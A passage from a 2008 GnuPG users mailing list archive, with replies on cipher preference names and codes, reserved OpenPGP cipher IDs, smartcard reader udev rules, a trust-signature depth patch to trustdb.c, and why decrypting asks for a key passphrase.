wish/can" Also, I couldn't locate the list of equivalences between names and codes, like AES256 - S9 in the gpg.man file... I found a list using google, but it is for an older version, which didn't include all the things available in version 1.4.9... Best Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIYHfMAAoJEMV4f6PvczxAW30H/R7SxGq8Z31H9R3tKtcyw4DN z9BCP6jIa0nfSBVG+dyp1obOrUtmJP4fFUy/T+EKu80ETn6/2b5VrqpQxs6Wmvwn UMfDod7OYK4AOFx1Wsf7YcvsRHqC0dmb0xQhJna+cqiUOPEQ+qLTRbpwsXBCo7hG tRD+u4QZZHl6c5looCNCFNVXlsgutqe70xWGQpJW+g1fGH9w1+bTp7CkPs5l0k9a 0KbCug7RJdrCtpZyRenC2vCQ36FdRWFEEFHkI7b/NpuFQa1Eu4Fn4arZ8uRimO2B 5C1aTtq65ohjOzHYfoZ4KQFrNv3apQqR3JNlEypx7WdW5sO4vOhvLYgD4iKENvg= =TNIM -----END PGP SIGNATURE----- From rjh at sixdemonbag.org Tue Jun 24 07:20:18 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Tue, 24 Jun 2008 00:20:18 -0500 Subject: About my prefered settings... In-Reply-To: <486077CC.6070004@gmail.com> References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net> <485F7410.4040901@gmail.com> <20080623172346.GA39571@jabberwocky.com> <486077CC.6070004@gmail.com> Message-ID: <48608412.1050208@sixdemonbag.org> Faramir wrote: > Thanks for the answers. I am a bit confused about if I should use > names like aes256 or codes like S9. Six of one, half dozen of another. I think it's generally for the best if people use names, since they're easier to read and harder to screw up. > Also, do I have to include all the cipher/digest/compress algorithms > available to my installed gpg, or just one or two? The idea would be > "if you can, use this one, if not, do as you wish/can" This is not really possible with GnuPG. setpref is used to advertise _capabilities_ to people far more than it is to advertise preferences. It appears to me to be badly misnamed. personal-thingy-preferences are the actual preference list, but is only applied to traffic you generate. From kevhilton at gmail.com Tue Jun 24 13:39:04 2008 From: kevhilton at gmail.com (Kevin Hilton) Date: Tue, 24 Jun 2008 06:39:04 -0500 Subject: About my prefered settings... Message-ID: <96c450350806240439q3d5ffd8cta1b29e3e076fd5c5@mail.gmail.com> Typing gpg -v --version will give you the capabilities along with the relative numbers for your compiled version of gpg Example: $ gpg -v --version gpg (GnuPG) 1.4.10-svn4783 Copyright (C) 2008 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Home: ~/.gnupg Supported algorithms: Pubkey: RSA, RSA-E, RSA-S, ELG-E, DSA Cipher: IDEA (S1), 3DES (S2), CAST5 (S3), BLOWFISH (S4), AES (S7), AES192 (S8), AES256 (S9), TWOFISH (S10), CAMELLIA128 (S11), CAMELLIA192 (S12), CAMELLIA256 (S13) Hash: MD5 (H1), SHA1 (H2), RIPEMD160 (H3), SHA256 (H8), SHA384 (H9), SHA512 (H10), SHA224 (H11) Compression: Uncompressed (Z0), ZIP (Z1), ZLIB (Z2), BZIP2 (Z3) -- Kevin Hilton -------------- next part -------------- An HTML attachment was scrubbed... URL: From dshaw at jabberwocky.com Tue Jun 24 14:56:53 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Tue, 24 Jun 2008 08:56:53 -0400 Subject: About my prefered settings... In-Reply-To: <486077CC.6070004@gmail.com> References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net> <485F7410.4040901@gmail.com> <20080623172346.GA39571@jabberwocky.com> <486077CC.6070004@gmail.com> Message-ID: <5CFD6CA0-FB6A-4387-9404-E8262D26EF07@jabberwocky.com> On Jun 24, 2008, at 12:27 AM, Faramir wrote: > Thanks for the answers. I am a bit confused about if I should use > names like aes256 or codes like S9. Also, do I have to include all the > cipher/digest/compress algorithms available to my installed gpg, or > just > one or two? The idea would be "if you can, use this one, if not, do > as > you wish/can" S9 and AES256 are the same thing. Use whichever you like. I'd recommend using the full name - the S9 thing is really just backwards compatibility to an older version of GPG. For personal-blahblah-preferences, list the ones you want to use when you make messages. If that list fails (because your recipients can't all handle them), you'll end up with 3DES. Similarly, when setting preferences on your key, list the ones you want other people to use when they make messages for you. Again, if that list fails (because the other recipients of the message can't all handle them), you'll end up with 3DES. > Also, I couldn't locate the list of equivalences between names and > codes, like AES256 - S9 in the gpg.man file... I found a list using > google, but it is for an older version, which didn't include all the > things available in version 1.4.9... gpg -v --version lists all the number codes, but again, use the names. David From faramir.cl at gmail.com Tue Jun 24 16:11:28 2008 From: faramir.cl at gmail.com (Faramir) Date: Tue, 24 Jun 2008 10:11:28 -0400 Subject: About my prefered settings... In-Reply-To: <5CFD6CA0-FB6A-4387-9404-E8262D26EF07@jabberwocky.com> References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net> <485F7410.4040901@gmail.com> <20080623172346.GA39571@jabberwocky.com> <486077CC.6070004@gmail.com> <5CFD6CA0-FB6A-4387-9404-E8262D26EF07@jabberwocky.com> Message-ID: <48610090.4020708@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 David Shaw escribi?: >> Also, I couldn't locate the list of equivalences between names and >> codes, like AES256 - S9 in the gpg.man file... I found a list using >> google, but it is for an older version, which didn't include all the >> things available in version 1.4.9... > > gpg -v --version lists all the number codes, but again, use the names. Thanks, David (and thanks to Kevin Hilton, he wrote about the same command, very useful), and of course, all the other people sharing their knoledge :) And I was wrong when I said I had not yet messed the config file... I erased the utf-8 preference, and now, there are no more weird characters: Home: C:/Archivos de programa/GNU/GnuPG Algoritmos disponibles: Clave p?blica: RSA, RSA-E, RSA-S, ELG-E, DSA Cifrado: 3DES, CAST5, BLOWFISH, AES, AES192, AES256, TWOFISH Resumen: MD5, SHA1, RIPEMD160, SHA256, SHA384, SHA512, SHA224 Compresi?n: Sin comprimir, ZIP, ZLIB, BZIP2 (last time, there were words like "Compresi??n:" and "Caracter??sticas:") Well, I think I don't have more doubts about gpg settings... I will do a little "research" about strength of algorithms,(wikipedia, probably), and I won't mess with the character sets any more... Now, the bad new... I will install gpg 2 in a virtual machine, and start trying to figure how do the new features work... so there will be a lot more questions... :P Best Regards, and thanks for the help provided, it is really hard to find a list so active and helpful as this one (Enigmail list is great, too... maybe because a lot of people is in both lists) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBCAAGBQJIYQCPAAoJEMV4f6PvczxAkfwH/jnMpmA8uPZvsCpV0P/wGISR aq80lEfk5+bgmPbX/aGAy6aFcTcWmhnrvK0t4BpJ2Bq4pQ4Sx+EUbhVkVKOg5bou SkrOKxeHBYZO2D0Hg1O0HRmFMJTcbQ7uHcPbZ6x+CRobcL+ZQeOjlKkKq6ZI8fky EGhHfl2gKYYOQRDyRVX5g5cD03R4geQE+K+St2YGH5QYxdiap1GWoWnBrSFLADx1 30JExaq3LsTe63Tazr/du842Tck9J5XpOOasnaWl3ZptFC1t/gT+KTPuKDoC2Wu0 5EAX0yl5HatAkinloT4KAuvV5Ao5X1Ie8M/E6XEwK/qHmvZkUqTcTctc5SkgvDk= =sQbN -----END PGP SIGNATURE----- From vedaal at hush.com Wed Jun 25 00:10:33 2008 From: vedaal at hush.com (vedaal at hush.com) Date: Tue, 24 Jun 2008 18:10:33 -0400 Subject: cipher ID's Message-ID: <20080624221035.DB80BD032F@mailserver10.hushmail.com> just curious // ? O.T. gnupg lists the following cipher ID's for symmetric algorithms: Home: ~/.gnupg Supported algorithms: Pubkey: RSA, RSA-E, RSA-S, ELG-E, DSA Cipher: IDEA (S1), 3DES (S2), CAST5 (S3), BLOWFISH (S4), AES (S7), AES192 (S8), AES256 (S9), TWOFISH (S10) rfc-4880 section 9.2 lists (S5) and (S6) as "Reserved" http://tools.ietf.org/html/rfc4880#section-9 reserved for what? and why couldn't they just be added later in sequence after whatever the last accepted algorithm is? vedaal any ads or links below this message are added by hushmail without my endorsement or awareness of the nature of the link -- Beauty Advice Just Got a Makeover Read reviews about the beauty products you have always wanted to try http://tagline.hushmail.com/fc/JKFkuIjyaQLHA3r4kJXTztVlfip7JJti1ekNNL6Xj5tftJ1DGG9Xx9/ From rjh at sixdemonbag.org Wed Jun 25 00:22:18 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Tue, 24 Jun 2008 17:22:18 -0500 Subject: cipher ID's In-Reply-To: <20080624221035.DB80BD032F@mailserver10.hushmail.com> References: <20080624221035.DB80BD032F@mailserver10.hushmail.com> Message-ID: <4861739A.7000309@sixdemonbag.org> vedaal at hush.com wrote: > reserved for what? Future use. Hate to give an answer that's so glib, but that's what it is. As of right now, I don't believe there's any consensus on what will ultimately go there, or if they will ever be used -- but the spec is including "room to grow", as it were, by telling every implementation author "don't use those codes for your own OpenPGP extensions, we may use them someday". > and why couldn't they just be added later in sequence after whatever > the last accepted algorithm is? People add ciphers to the OpenPGP suite which are not explicitly included in the spec. E.g., Camellia right now, or the people who are experimenting around with ECDSA, or... etc. If it was just "add it to the end", then every experimental OpenPGP platform out there would have problems. If S14 (to pick a random unused cipher number) is an experimental implementation of RC6, then what happens when AES-256.5 (a full 1.414 times stronger than AES256!) gets assigned to S14? Fine, the experimental group moves up to S15. But all of the traffic they've already generated is still marked as S14. That means when they try to decrypt their traffic, they'll be decrypting it with AES-256.5 instead of RC6. Which means decryptions will fail. Which means ugly kluges will have to be written to handle this. And... etc., etc. It's easier on everyone if it's done OpenPGP's way. (Note -- while RC6 is a real algorithm, AES256.5 is not; it's firmly tongue in cheek.) From michael at vorlon.ping.de Tue Jun 24 23:29:20 2008 From: michael at vorlon.ping.de (Michael Bienia) Date: Tue, 24 Jun 2008 23:29:20 +0200 Subject: SCM SPR532 & Ubuntu 8.04 & GnuPG 1.4.6 versus GnuPG 2.0.7 In-Reply-To: <43cee7130805311039h738c4ea3x3b6e814ed2095ca7@mail.gmail.com> References: <43cee7130805311039h738c4ea3x3b6e814ed2095ca7@mail.gmail.com> Message-ID: <20080624212920.GA10462@vorlon.ping.de> On 2008-05-31 19:39:18 +0200, Tobias Weisserth wrote: Hello, > I followed all the tutorials and howto documents I could and I managed to > figure out that I had to tweak the USB driver bundle installation of the SCM > driver to copy the bundle into the right directory for Ubuntu 8.04. After > restarting pcscd I could use GnuPG 1.4.6 with the card. I've a SCM SPR532 too, and it works without problems on Ubuntu 8.04. But I don't use pscd, just plain gpg/gpg2 with gpg-agent to access it. > So, after trying different things I managed to initialize my card and > generate a new key using GnuPG 1.4.6 (current Ubuntu stable package). > > However, GnuPG 2.0.7 (Ubuntu 8.04 package) will not read the card like GnuPG > 1.4.6. When I do a Have you tried to use the card reader with gpg only (no pcscd)? You need to get udev to create the device nodes with the correct permission to use the card reader as a user. I attached my udev rules. Put that file into /etc/udev/rules.d, create the "scard" group, add your user to it (don't forget to re-login) and restart udev. Don't forget to stop pcscd. (Note to self: I should get this bug finally fixed for Ubuntu intrepid). You should be able to access the card reader through gpg with and without gpg-agent. > I would also like to know how the whole setup is integrated with graphical > clients in Ubuntu 8.04, for example Evolution, Seahorse and such. I use pinentry-gtk2 to get told when I should enter the pin. As I don't use Evolution or Seahorse, I don't know how to best integrate with it. I know that Seahorse has it's own gpg-agent, but I don't know how well Seahorse works with the original gpg-agent or if the seahorse-agent can access the card reader. When you test with gpg-agent make sure that you use the one provided from gpg2. Regards, Michael -------------- next part -------------- ACTION!="add", GOTO="gnupg-ccid_rules_end" # USB SmartCard Readers ## SCM readers (SCR335, SPR532, & Co) SUBSYSTEM=="usb", ATTRS{idVendor}=="04e6", ATTRS{idProduct}=="e001", GROUP="scard", MODE="0660" SUBSYSTEM=="usb", ATTRS{idVendor}=="04e6", ATTRS{idProduct}=="e003", GROUP="scard", MODE="0660" SUBSYSTEM=="usb", ATTRS{idVendor}=="04e6", ATTRS{idProduct}=="5115", GROUP="scard", MODE="0660" # PCMCIA SmartCard Readers ## Omnikey CardMan 4040 SUBSYSTEM=="cardman_4040", GROUP="scard", MODE="0660" LABEL="gnupg-ccid_rules_end" From jmoore3rd at bellsouth.net Wed Jun 25 01:22:50 2008 From: jmoore3rd at bellsouth.net (John W. Moore III) Date: Tue, 24 Jun 2008 19:22:50 -0400 Subject: cipher ID's In-Reply-To: <4861739A.7000309@sixdemonbag.org> References: <20080624221035.DB80BD032F@mailserver10.hushmail.com> <4861739A.7000309@sixdemonbag.org> Message-ID: <486181CA.2080409@bellsouth.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Robert J. Hansen wrote: > People add ciphers to the OpenPGP suite which are not explicitly > included in the spec. E.g., Camellia right now, or the people who are > experimenting around with ECDSA, or... etc. > > If it was just "add it to the end", then every experimental OpenPGP > platform out there would have problems. If S14 (to pick a random unused > cipher number) is an experimental implementation of RC6, then what > happens when AES-256.5 (a full 1.414 times stronger than AES256!) gets > assigned to S14? > > Fine, the experimental group moves up to S15. But all of the traffic > they've already generated is still marked as S14. That means when they > try to decrypt their traffic, they'll be decrypting it with AES-256.5 > instead of RC6. Which means decryptions will fail. Which means ugly > kluges will have to be written to handle this. And... etc., etc. > > It's easier on everyone if it's done OpenPGP's way. Most Excellent Answer! FWIW; the 'Working Group' is still mulling the inclusion of OID as part of ECC. Who knows what, if anything, will be assigned to these identifiers. If One follows the 'David Shaw' proposals for Camellia algorithm it will be found that the identify nomenclature changed several times. It still isn't 'final adopted' and may change again. I Love the "Hansen/Clizbe" Warning; if Ya follow the /Bleeding Edge/ and things get broken You 'own' all the pieces! JOHN ;) Timestamp: Tuesday 24 Jun 2008, 19:21 --400 (Eastern Daylight Time) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.5.0-svn4754: (MingW32) Comment: Public Key at: http://tinyurl.com/8cpho Comment: Gossamer Spider Web of Trust: https://www.gswot.org Comment: Homepage: http://tinyurl.com/yzhbhx iQEcBAEBCgAGBQJIYYHIAAoJEBCGy9eAtCsPVisIAIonv1JwEKeQVp6gtdP8HyoY WFLzTPvQCMdLbuAyen66xSbnLYsLKx70CjY/l6Ku9xpyIvXv5HNeUU80l8AbGAFM fhLjOldLQWrAgaBcC0HNa4DIJUTirKYRZy1iRYxF+Q45d7QICd1S7/hC1Zm+xMqs haJKrvh0KGg7x9braUKuItMzIs8Gv5FvF0g1CrYD217noRKj9b9ew9y0RuAweXNw XrbZAfQmxniXRME+TL7GGn75sxq1p8HqgvkSNM4X/8eH/F2UF5R4XoODhrhK44mR V5BMPc4qWTtRVlaRR6cvAcZC4rXoNivjfHKJ0RHNicZTU5ScO/TSO+Nip20ObN8= =Nadv -----END PGP SIGNATURE----- From dshaw at jabberwocky.com Wed Jun 25 01:36:54 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Tue, 24 Jun 2008 19:36:54 -0400 Subject: cipher ID's In-Reply-To: <20080624221035.DB80BD032F@mailserver10.hushmail.com> References: <20080624221035.DB80BD032F@mailserver10.hushmail.com> Message-ID: <0D281235-A570-4576-935F-7E7610A30293@jabberwocky.com> On Jun 24, 2008, at 6:10 PM, vedaal at hush.com wrote: > just curious // ? O.T. > > gnupg lists the following cipher ID's for symmetric algorithms: > > Home: ~/.gnupg > Supported algorithms: > Pubkey: RSA, RSA-E, RSA-S, ELG-E, DSA > Cipher: IDEA (S1), 3DES (S2), CAST5 (S3), BLOWFISH (S4), AES (S7), > AES192 (S8), AES256 (S9), TWOFISH (S10) > > > rfc-4880 section 9.2 > lists (S5) and (S6) as "Reserved" > http://tools.ietf.org/html/rfc4880#section-9 > > reserved for what? > and why couldn't they just be added later in sequence after > whatever the > last accepted algorithm is? They could have been. In the case of S5 and S6, they're marked as reserved because they were actually allocated at one point for SAFER- SK128 (S5) and DES/SK (S6). They're marked as reserved now to make sure they're not used by anyone for anything. David From david at coffeefish.org Wed Jun 25 04:55:26 2008 From: david at coffeefish.org (David Koppenhofer) Date: Tue, 24 Jun 2008 22:55:26 -0400 Subject: Multiple uid's vs. multiple primary keys & "master signing keys" In-Reply-To: <20080623202353.GF39571@jabberwocky.com> References: <20080623202353.GF39571@jabberwocky.com> Message-ID: On Mon, Jun 23, 2008 at 4:23 PM, David Shaw wrote: > On Mon, Jun 23, 2008 at 03:28:44PM -0400, David Koppenhofer wrote: >> Hi everyone, >> >> I'm a potential new gpg user, and have been struggling with a few >> questions about how uid's and keys should be configured.e. >> ... > > It's handy to make a distinction between your work and personal life, > and for many or even most people, their personal "identity" is a lot > longer lived than their work "identity". People keep the same > personal address for years, but don't as often keep the same job (and > thus job address) for that long. > > Personally, I do this with two keys. One personal, and one work. I > don't really get the work one signed, as people who want to reach me > generally do so in my personal context (I do FOSS work, but I do it > under my personal address as I've found that many people just send > mail to personal addresses even there is a special address for FOSS > stuff). Thanks for the quick and helpful reply. It's good to know that I wasn't out in left field with my understanding of gnupg. :-) Now, I can make some decisions on how to proceed. David From david at coffeefish.org Wed Jun 25 05:03:51 2008 From: david at coffeefish.org (David Koppenhofer) Date: Tue, 24 Jun 2008 23:03:51 -0400 Subject: Multiple uid's vs. multiple primary keys & "master signing keys" In-Reply-To: <48606A54.1020104@gmail.com> References: <48606A54.1020104@gmail.com> Message-ID: On Mon, Jun 23, 2008 at 11:30 PM, Faramir wrote: > I heard, a couple of weeks ago, about somebody who lost all her email > accounts because her primary email address was hacked. The hacker knew > the other email addresses, used the option "I forgot my password, send > it to my secondary email", and all the other email accounts sent their > passwords to the email that was compromised... allowing the hacker to > take control of all these accounts, changing the security questions and > secondary emails, so the true owner can't recover the accounts. The thought of 'tying' my email accounts together through "I forgot my password, send to my secondary email" has given me pause in the past. I don't think any of my email accounts are currently set up with another as a "secondary" email; password recovery is usually through other means (e.g. security questions). Thanks for sharing your thoughts about this. David From faramir.cl at gmail.com Wed Jun 25 11:45:57 2008 From: faramir.cl at gmail.com (Faramir) Date: Wed, 25 Jun 2008 05:45:57 -0400 Subject: Multiple uid's vs. multiple primary keys & "master signing keys" In-Reply-To: References: <48606A54.1020104@gmail.com> Message-ID: <486213D5.80402@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 David Koppenhofer escribi?: > On Mon, Jun 23, 2008 at 11:30 PM, Faramir wrote: >> I heard, a couple of weeks ago, about somebody who lost all her email >> accounts because her primary email address was hacked. The hacker knew >> the other email addresses, used the option "I forgot my password, send >> it to my secondary email", and all the other email accounts sent their >> passwords to the email that was compromised... allowing the hacker to >> take control of all these accounts, changing the security questions and >> secondary emails, so the true owner can't recover the accounts. > > The thought of 'tying' my email accounts together through "I forgot my > password, send to my secondary email" has given me pause in the past. > > I don't think any of my email accounts are currently set up with > another as a "secondary" email; password recovery is usually through > other means (e.g. security questions). > > Thanks for sharing your thoughts about this. Security questions are fine, but, as an example, gmail only allow to use that option after several days have passed since the last user login. But sending the new pass to a secondary email account is always ready. Also, if I am not wrong, at the time when you needed an invitation to make a gmail account, if you invited yourself, the new account had the secondary email account set by default... Now I created a "secret" account, and bound my emails to that one... it is not in any of my address books, and there will never be a message sent from that address... I hope that would be secure enough... I know this is a bit off-topic, but since gnupg is focused on privacy and security... and this relates to multiple UIDs bound to the same key. Best Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBCAAGBQJIYhPVAAoJEMV4f6PvczxADaUIAKSDg52YQnUHPEAr1qvt7Ml3 urSn9tAIE4EvdQ8Xsn5/ZzwcV4HYENhP5XqakQwYBIDwuXBM4lS6bIyC/FF7fJGC GkMIedn/c6HaYBLu/yNmYwQFwFuurQzCx8sp5VUxY7g/tB+pv93wcY7T/yrck6iP 7GOXV9RbyE93R+US/aCNynjxFg+enCUxhz+NWvnC2mR9t1P1lZnnTKE66ZoKmhHo 4cGSuLYalvXDJCbP2Q4MGdbAeSWF1CfYGTw/RwEn4e0PczKCiLCd7EaNNUcfRg3a dPqS8aYqdTVHWY1fLIjp/3CkF7pl4ZO64no2+lxg6GLlpMqEzP/bk09B5s4FJBY= =/eYI -----END PGP SIGNATURE----- From david at coffeefish.org Wed Jun 25 14:20:15 2008 From: david at coffeefish.org (David Koppenhofer) Date: Wed, 25 Jun 2008 08:20:15 -0400 Subject: Multiple uid's vs. multiple primary keys & "master signing keys" In-Reply-To: <486213D5.80402@gmail.com> References: <48606A54.1020104@gmail.com> <486213D5.80402@gmail.com> Message-ID: On Wed, Jun 25, 2008 at 5:45 AM, Faramir wrote: > David Koppenhofer escribi?: >> I don't think any of my email accounts are currently set up with >> another as a "secondary" email; password recovery is usually through >> other means (e.g. security questions). > > Security questions are fine, but, as an example, gmail only allow to > use that option after several days have passed since the last user > login. But sending the new pass to a secondary email account is always > ready. Also, if I am not wrong, at the time when you needed an > invitation to make a gmail account, if you invited yourself, the new > account had the secondary email account set by default... > > Now I created a "secret" account, and bound my emails to that one... > it is not in any of my address books, and there will never be a message > sent from that address... I hope that would be secure enough... > > I know this is a bit off-topic, but since gnupg is focused on privacy > and security... and this relates to multiple UIDs bound to the same key. I checked several of my email accounts, and a few do use a secondary email address (like gmail). There are also all my non-email web accounts that are associated with an email address, but I'm not quite as concerned about those since those wouldn't show up in UIDs. (though they are vulnerable if my email account is cracked) It just goes to show that you need to pick a good pass[word|phrase], especially for your main email account, and hope that the administrator had made it resistant to cracking attempts. Sorry if this drifted too far OT for the list... David From dshaw at jabberwocky.com Thu Jun 26 20:54:14 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Thu, 26 Jun 2008 14:54:14 -0400 Subject: Questions about trust signatures In-Reply-To: <20080616210212.GB14148@jabberwocky.com> References: <17789248.post@talk.nabble.com> <20080613214255.GD4107@jabberwocky.com> <17872484.post@talk.nabble.com> <20080616210212.GB14148@jabberwocky.com> Message-ID: <20080626185413.GA2349@jabberwocky.com> On Mon, Jun 16, 2008 at 05:02:12PM -0400, David Shaw wrote: > Interesting. I'm going to have to go back to my notes from when I > wrote that code back in 2002, and see what I was shooting for. My > memory is that I wanted the trust depth to automatically degrade as > the chain continued. It's possible this is just a bug, or it is > possible I did it this way on purpose (PGP compatibility, maybe?) After some digging: GPG's trust signature implementation was based on, and tested against PGP 7 (as a black box - we didn't see any of the code). My best guess is this is what PGP 7 did at the time? I don't really recall, and don't have a copy to test against any longer. In any event, PGP 9 does lower the trust depth as the chain gets longer, so I will update the calculations to match that. Here is a patch. Can you give it a try and see if it works as expected for you? David -------------- next part -------------- Index: trustdb.c =================================================================== --- trustdb.c (revision 4795) +++ trustdb.c (working copy) @@ -1933,50 +1933,72 @@ (uidnode && check_regexp(kr->trust_regexp, uidnode->pkt->pkt.user_id->name)))) { - if(DBG_TRUST && opt.trust_model==TM_PGP && sig->trust_depth) - log_debug("trust sig on %s, sig depth is %d, kr depth is %d\n", - uidnode->pkt->pkt.user_id->name,sig->trust_depth, - kr->trust_depth); - /* Are we part of a trust sig chain? We always favor the latest trust sig, rather than the greater or lesser trust sig or value. I could make a decent argument for any of these cases, but this seems to be what PGP does, and I'd like to be compatible. -dms */ - if(opt.trust_model==TM_PGP && sig->trust_depth - && pk->trust_timestamp<=sig->timestamp - && (sig->trust_depth<=kr->trust_depth - || kr->ownertrust==TRUST_ULTIMATE)) + if(opt.trust_model==TM_PGP + && sig->trust_depth + && pk->trust_timestamp<=sig->timestamp) { - /* If we got here, we know that: + byte depth; - this is a trust sig. + /* If the depth on the signature is less than the + chain currently has, then use the signature depth + so we don't increase the depth beyond what the + signer wanted. If the depth on the signature is + more than the chain currently has, then use the + chain depth so we use as much of the signature + depth as the chain will permit. An ultimately + trusted signature can restart the depth to + whatever level it likes. */ - it's a newer trust sig than any previous trust - sig on this key (not uid). + if(sig->trust_depthtrust_depth + || kr->ownertrust==TRUST_ULTIMATE) + depth=sig->trust_depth; + else + depth=kr->trust_depth; - it is legal in that it was either generated by an - ultimate key, or a key that was part of a trust - chain, and the depth does not violate the - original trust sig. + if(depth) + { + if(DBG_TRUST) + log_debug("trust sig on %s, sig depth is %d," + " kr depth is %d\n", + uidnode->pkt->pkt.user_id->name, + sig->trust_depth, + kr->trust_depth); - if there is a regexp attached, it matched - successfully. - */ + /* If we got here, we know that: - if(DBG_TRUST) - log_debug("replacing trust value %d with %d and " - "depth %d with %d\n", - pk->trust_value,sig->trust_value, - pk->trust_depth,sig->trust_depth); + this is a trust sig. - pk->trust_value=sig->trust_value; - pk->trust_depth=sig->trust_depth-1; + it's a newer trust sig than any previous trust + sig on this key (not uid). - /* If the trust sig contains a regexp, record it - on the pk for the next round. */ - if(sig->trust_regexp) - pk->trust_regexp=sig->trust_regexp; + it is legal in that it was either generated by an + ultimate key, or a key that was part of a trust + chain, and the depth does not violate the + original trust sig. + + if there is a regexp attached, it matched + successfully. + */ + + if(DBG_TRUST) + log_debug("replacing trust value %d with %d and " + "depth %d with %d\n", + pk->trust_value,sig->trust_value, + pk->trust_depth,depth); + + pk->trust_value=sig->trust_value; + pk->trust_depth=depth-1; + + /* If the trust sig contains a regexp, record it + on the pk for the next round. */ + if(sig->trust_regexp) + pk->trust_regexp=sig->trust_regexp; + } } if (kr->ownertrust == TRUST_ULTIMATE) From naeem.m.afzal at intel.com Sat Jun 28 04:04:24 2008 From: naeem.m.afzal at intel.com (Afzal, Naeem M) Date: Fri, 27 Jun 2008 19:04:24 -0700 Subject: why we need passphrase Message-ID: <821A1558D8819A4BB700FFF265F6781F0646C07C@orsmsx505.amr.corp.intel.com> Hi, In order to understand GnuPG, I tried to create private keys on two ubuntu systems. Here are my steps and I would ask my question at the end as I need to show what I did. 1. System A: Created private and public key by using 'gpg --gen-key' and then 'gpg --export --armor -out userA.asc -r 'USER A' 2. System B: Created private and public key by using 'gpg --gen-key' and then imported public key of userA 'gpg --import userA.asc' 3. System B: encrypted a file for userA using userA's public key ' gpg -o file_from_userB -r userA --encrypt file_to_encrypt 4. System A: Tried to decrypt file_from_userB gpg -o decrypted_file --decrypt file_from_userB at this point, it asks to provide passphrase of userA. Is it possible to avoid where I need to provide passphrase at all? My understanding was that the file was encrypted with userA's credential to begin with, and userA should be decrtypt it without providing any passphrase? How can do this procedure where I don't have to provide passphrase in decryption? Thanks a lot. Naeem From faramir.cl at gmail.com Sat Jun 28 20:08:12 2008 From: faramir.cl at gmail.com (Faramir) Date: Sat, 28 Jun 2008 14:08:12 -0400 Subject: why we need passphrase In-Reply-To: <821A1558D8819A4BB700FFF265F6781F0646C07C@orsmsx505.amr.corp.intel.com> References: <821A1558D8819A4BB700FFF265F6781F0646C07C@orsmsx505.amr.corp.intel.com> Message-ID: <48667E0C.104@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Afzal, Naeem M escribi?: > Hi, > > In order to understand GnuPG, I tried to create private keys on two ubuntu systems. Here are my steps and I would ask my question at the end as I need to show what I did. > > 1. System A: Created private and public key by using 'gpg --gen-key' and then > 'gpg --export --armor -out userA.asc -r 'USER A' > > 2. System B: Created private and public key by using 'gpg --gen-key' and then imported public key of userA > 'gpg --import userA.asc' > > 3. System B: encrypted a file for userA using userA's public key ' > gpg -o file_from_userB -r userA --encrypt file_to_encrypt > > 4. System A: Tried to decrypt file_from_userB > gpg -o decrypted_file --decrypt file_from_userB > at this point, it asks to provide passphrase of userA. Is it possible to avoid where I need to provide passphrase at all? My understanding was that the file was encrypted with userA's credential to begin with, and userA should be decrtypt it without providing any passphrase? How can do this procedure where I don't have to provide passphrase in decryption? Because the key itself is protected by a passphrase. You CAN remove that protection, and you can even generate keys without passphrase.. but the idea is, if you have to go to the bathroom, and someone else tries to read your messages, or steal your key... the thief won't have much luck, since if the passphrase is strong, he wont be able to activate the key... unless the thief is lucky enough to "guess" the passphrase hitting the keyboard randomly... A good passphrase would make bruteforce attack infeasible, it won't be in any dictionary (so dictionary attacks won't work)... so, if you remove the passphrase, you'll want to take extra measures to avoid problems... but maybe you know nobody is going to touch your computer... Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBCAAGBQJIZn4MAAoJEMV4f6PvczxAw1cIAKoX1tnr4I2iNvu5W13wZ+k5 Q4mGqeGxat9x9r7XVpHm9pisspMr4atSfipA51KIhmSA7DMlPVEr4czU+4QG5kex nGipcBf5kqtLO7VBXO3LJuEjWa0YBOZktQRkJJga85XI+W43dGSJUsDCz4Qwkaqj 0g7ZKv+BZoVmxZ73Lh9sS5qIPbDnl6TERrKBXYGfdeqIOZodKyZsNsGnojp1OXqM 1KnKYCtGmwuj8HNsrMRVWQ3rJmcrrqBbFUOGKQAqlNHbc3FksSsT1HKsy7kK/LJC VKS9u1ksf+r7IgCq2+d7WkwoqEppJQV+aR2i6m/YdUTNJ1qEYIIFcU7xa2L4vSM= =dxuD -----END PGP SIGNATURE----- From faramir.cl at gmail.com Sat Jun 28 19:58:44 2008 From: faramir.cl at gmail.com (Faramir) Date: Sat, 28 Jun 2008 13:58:44 -0400 Subject: A small question about GnuPG 2 Message-ID: <48667BD4.7090703@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Well, as far as I know, it adds support for s/MIME... and if I am not wrong, that would mean certificates like the ones issued by CAcert, Comodo, et all... But, is GnuPG capable of generating those certificates? Or we will still require OpenSSL or equivalent to make them? Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBCAAGBQJIZnvUAAoJEMV4f6PvczxAIJ4H/0SZcxfA766oMexfAvgU+LOl 